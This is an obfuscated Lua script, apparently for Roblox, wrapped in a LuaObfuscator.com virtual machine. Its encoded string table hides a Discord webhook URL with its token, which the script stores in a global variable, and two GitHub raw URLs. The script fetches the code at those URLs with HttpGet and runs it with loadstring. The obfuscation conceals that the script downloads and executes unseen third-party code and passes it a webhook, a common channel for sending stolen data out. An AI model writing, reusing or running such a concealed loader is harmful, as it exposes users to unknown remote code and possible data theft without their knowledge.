--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v120=v5(v87,v19);v19=nil;return v120;else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((929 -(214 + 713))^(v32-((8 -6) -1))))%(2^(((v33-((118 -(32 + 85)) + 0)) -(v32-(2 -(1 + 0)))) + (1 -0))) ;return v88-(v88%(2 -1)) ;else local v89=(621 -(555 + 64))^(v32-(1 -0)) ;return (((v31%(v89 + v89))>=v89) and (932 -(857 + 74))) or (568 -(367 + 45 + 156)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (6 -2) ;return (v40 * 16777216) + (v39 * (120312 -54776)) + (v38 * (606 -(87 + 263))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=181 -(67 + 113) ;local v44=(v20(v42,1,15 + 5 ) * (2^((96 -(10 + 8)) -46))) + v41 ;local v45=v20(v42,21,23 + 8 );local v46=((v20(v42,127 -95 )==((946 + 7) -(802 + 150))) and  -(2 -1)) or (792 -(368 + 423)) ;if (v45==(0 -0)) then if (v44==(0 + 0)) then return v46 * (997 -(915 + 82)) ;else local v108=0 -0 ;while true do if (v108==(0 + 0)) then v45=1;v43=0 -0 ;break;end end end elseif (v45==((10163 -6929) -(1069 + 118))) then return ((v44==(0 -(0 -0))) and (v46 * (1/0))) or (v46 * NaN) ;end return v8(v46,v45-(2237 -1214) ) * (v43 + (v44/((1 + 1)^(92 -40)))) ;end local function v25(v47) local v48=442 -(416 + 26) ;local v49;local v50;while true do if (v48==(9 -(1144 -(116 + 1022)))) then return v6(v50);end if (v48==(0 + 0)) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=439 -(145 + 293) ;end if (v48==(432 -(44 + 386))) then v50={};for v109=1, #v49 do v50[v109]=v2(v1(v3(v49,v109,v109)));end v48=1489 -(998 + 488) ;end if (v48==(1 + 0)) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=774 -(201 + 571) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97,v98) local v99=(function() return 0;end)();local v90=(function() return;end)();local v91=(function() return;end)();while true do local v107=(function() return 0 + 0 ;end)();while true do if (v107~=0) then else if (v99~=1) then else local v121=(function() return 0;end)();while true do if (0~=v121) then else while true do if (v90==(0 + 0)) then v91=(function() return v92();end)();if (v93(v91, #"[", #"}")==(438 -(262 + 176))) then local v166=(function() return 0;end)();local v167=(function() return;end)();local v168=(function() return;end)();local v169=(function() return;end)();while true do if (v166==(1721 -(345 + 1376))) then v167=(function() return v93(v91,690 -(198 + 490) , #"xnx");end)();v168=(function() return v93(v91, #"0836",26 -20 );end)();v166=(function() return 2 -1 ;end)();end if (v166==(1207 -(696 + 510))) then local v181=(function() return 0 -0 ;end)();while true do if (v181==(1262 -(1091 + 171))) then v169=(function() return {v94(),v94(),nil,nil};end)();if (v167==0) then local v189=(function() return 0 + 0 ;end)();local v190=(function() return;end)();while true do if (v189==0) then v190=(function() return 0;end)();while true do if (0==v190) then v169[ #"xnx"]=(function() return v94();end)();v169[ #".dev"]=(function() return v94();end)();break;end end break;end end elseif (v167== #"}") then v169[ #"19("]=(function() return v95();end)();elseif (v167==(6 -4)) then v169[ #"91("]=(function() return v95() -(2^16) ;end)();elseif (v167~= #"asd") then else local v195=(function() return 0 -0 ;end)();while true do if (v195~=(374 -(123 + 251))) then else v169[ #"19("]=(function() return v95() -((9 -7)^16) ;end)();v169[ #".dev"]=(function() return v94();end)();break;end end end v181=(function() return 1;end)();end if ((699 -(208 + 490))==v181) then v166=(function() return 1 + 1 ;end)();break;end end end if (v166~=3) then else if (v93(v168, #"xxx", #"-19")== #"\\") then v169[ #"asd1"]=(function() return v96[v169[ #".dev"]];end)();end v97[v98]=(function() return v169;end)();break;end if (v166==(1 + 1)) then if (v93(v168, #",", #"|")~= #"[") then else v169[838 -(660 + 176) ]=(function() return v96[v169[1 + 1 ]];end)();end if (v93(v168,204 -(14 + 188) ,2)== #"!") then v169[ #"91("]=(function() return v96[v169[ #"91("]];end)();end v166=(function() return 3;end)();end end end break;end end return v90,v91,v92,v93,v94,v95,v96,v97,v98;end end end if (v99~=(675 -(534 + 141))) then else v90=(function() return 0 + 0 ;end)();v91=(function() return nil;end)();v99=(function() return 1 + 0 ;end)();end break;end end end end;end)();local v52=(function() return function(v100,v101,v102) local v103=(function() return 0 + 0 ;end)();local v104=(function() return;end)();while true do if (v103==0) then v104=(function() return 0;end)();while true do if (v104~=(0 -0)) then else local v122=(function() return 0;end)();while true do if (v122==(0 -0)) then v100[v101-#"," ]=(function() return v102();end)();return v100,v101,v102;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v66= #".",v57 do local v67=(function() return 0;end)();local v68=(function() return;end)();local v69=(function() return;end)();while true do if (v67~=1) then else if (v68== #"~") then v69=(function() return v21()~=(0 -0) ;end)();elseif (v68==2) then v69=(function() return v24();end)();elseif (v68== #"asd") then v69=(function() return v25();end)();end v58[v66]=(function() return v69;end)();break;end if (0~=v67) then else local v112=(function() return 0;end)();local v113=(function() return;end)();while true do if (v112~=(0 + 0)) then else v113=(function() return 0;end)();while true do if (v113~=0) then else local v123=(function() return 0 + 0 ;end)();while true do if (v123==0) then v68=(function() return v21();end)();v69=(function() return nil;end)();v123=(function() return 1;end)();end if (v123~=(397 -(115 + 281))) then else v113=(function() return 2 -1 ;end)();break;end end end if (1~=v113) then else v67=(function() return 1 + 0 ;end)();break;end end break;end end end end end v56[ #"xnx"]=(function() return v21();end)();for v70= #"|",v23() do FlatIdent_44839,Descriptor,v21,v20,v22,v23,v58,v53,v70=(function() return v51(FlatIdent_44839,Descriptor,v21,v20,v22,v23,v58,v53,v70);end)();end for v71= #"~",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[7 -5 ];local v65=v60[870 -(550 + 317) ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=1;local v77= -(1 -0);local v78={};local v79={...};local v80=v12("#",...) -1 ;local v81={};local v82={};for v105=0 -0 ,v80 do if ((v105>=v74) or (1417>3629)) then v78[v105-v74 ]=v79[v105 + 1 ];else v82[v105]=v79[v105 + (2 -1) ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do local v106=285 -(134 + 151) ;while true do if (v106==(1665 -(970 + 695))) then v84=v72[v76];v85=v84[1];v106=1 -0 ;end if (v106==(1991 -(582 + (2620 -(323 + 889))))) then if (v85<=((148 -(4 + 110)) -(64 -40))) then if (v85<=(4 -0)) then if ((4795>402) and (v85<=(3 -2))) then if (v85>(1824 -((1779 -(57 + 527)) + (2056 -(41 + 1386))))) then v82[v84[(105 -(17 + 86)) -0 ]]={};else local v126=v84[2];local v127=v82[v84[3]];v82[v126 + 1 + 0 ]=v127;v82[v126]=v127[v84[4]];end elseif (v85<=((823 -(361 + 219)) -(187 + 54))) then v82[v84[782 -(162 + 618) ]]=v62[v84[3 + 0 ]];elseif ((4813>3565) and (v85==(2 + 1))) then v82[v84[2]]={};else local v145=0 -0 ;local v146;local v147;local v148;local v149;while true do if ((1 -0)==v145) then v77=(v148 + v146) -(1 + 0) ;v149=1636 -(1373 + (586 -323)) ;v145=1002 -(451 + 549) ;end if ((3912==3912) and (v145==(1 + 1))) then for v183=v146,v77 do v149=v149 + (1 -(320 -(53 + 267))) ;v82[v183]=v147[v149];end break;end if (v145==(0 -0)) then v146=v84[1386 -(746 + 638) ];v147,v148=v75(v82[v146](v13(v82,v146 + 1 ,v84[2 + 1 ])));v145=1;end end end elseif (v85<=(9 -2)) then if (v85<=(346 -(218 + (356 -233)))) then local v133=1581 -(1535 + 11 + 35) ;local v134;local v135;while true do if (v133==(167 -(122 + 44))) then v82[v134 + 1 + 0 ]=v135;v82[v134]=v135[v84[4]];break;end if (v133==(0 + 0)) then v134=v84[562 -((528 -222) + 254) ];v135=v82[v84[1 + 2 ]];v133=1;end end elseif (v85==((424 -(15 + 398)) -5)) then v82[v84[1469 -(899 + 568) ]]=v84[2 + 1 ];else local v152=v84[(986 -(18 + 964)) -2 ];v82[v152]=v82[v152](v13(v82,v152 + (604 -(268 + (1260 -925))) ,v84[293 -(60 + (763 -533)) ]));end elseif (v85<=(580 -(426 + 92 + 54))) then v82[v84[2]]();elseif ((2821<=4824) and (v85>(2 + 0 + 7))) then do return;end else v82[v84[1458 -(282 + 1174) ]][v84[814 -(569 + 242) ]]=v84[11 -7 ];end elseif (v85<=(1 + (864 -(20 + 830)))) then if (v85<=12) then if ((1738<=2195) and (v85==(1035 -(706 + 318)))) then local v136=v84[2];v82[v136]=v82[v136](v13(v82,v136 + (1252 -(721 + 530)) ,v77));else local v138=1271 -(738 + 207 + 326) ;local v139;while true do if (((0 + 0) -0)==v138) then v139=v84[2 + 0 ];v82[v139]=v82[v139](v13(v82,v139 + (701 -(271 + 429)) ,v77));break;end end end elseif ((41<=3018) and (v85<=((23 -11) + 1))) then v82[v84[1502 -(1408 + 92) ]]=v62[v84[1089 -(461 + (751 -(116 + 10))) ]];elseif ((2145<=4104) and (v85>14)) then v82[v84[1290 -(993 + 295) ]]();else v82[v84[1 + (66 -(30 + 35)) ]]=v84[3]~=(1171 -(418 + 753)) ;end elseif (v85<=(7 + 11)) then if (v85<=16) then local v142=v84[1 + 1 ];v82[v142]=v82[v142](v13(v82,v142 + 1 + 0 ,v84[1 + 0 + 1 + 1 ]));elseif (v85>(755 -(542 + 196))) then v82[v84[2]]=v84[532 -(406 + 123) ]~=(1769 -(1749 + 20)) ;else v82[v84[(1258 -(1043 + 214)) + 1 ]]=v84[1325 -(1249 + 73) ];end elseif (v85<=((14 -7) + 12)) then do return;end elseif ((2689<4845) and (v85==20)) then local v160=v84[1147 -(466 + 679) ];local v161,v162=v75(v82[v160](v13(v82,v160 + (2 -(1 + 0)) ,v84[8 -5 ])));v77=(v162 + v160) -1 ;local v163=1900 -(106 + 1794) ;for v177=v160,v77 do v163=v163 + 1 + 0 ;v82[v177]=v161[v163];end else v82[v84[2]][v84[1 + 2 ]]=v84[(6 + 5) -(3 + 4) ];end v76=v76 + ((4 -2) -(3 -2)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083Q0003023Q005F47030F3Q00776562682Q6F6B73646973636F726403793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F3133303639383139343935342Q3531373037362F3978316143732D32745A4B7A6E5A496D315146636E657044384A6A342D5F61342Q455A563034412Q724E5A6E456A59345264655439765751703332563239735875744A38030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034A3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F534841524B583531362F534852454B412Q5441434B2F6D61696E2F534841524B4C4F4C322E6C756103433Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F53696D706C652D78612F46697363682F6D61696E2F4465787A796269742E6C756100134Q00037Q00120D000100013Q00301500010002000300120D000100043Q00120D000200053Q002005000200020006001211000400074Q00100002000400022Q000E000300014Q00100001000300022Q000F00010001000100120D000100043Q00120D000200053Q002005000200020006001211000400084Q0014000200044Q000B00013Q00022Q000F0001000100012Q00133Q00017Q00",v9(),...);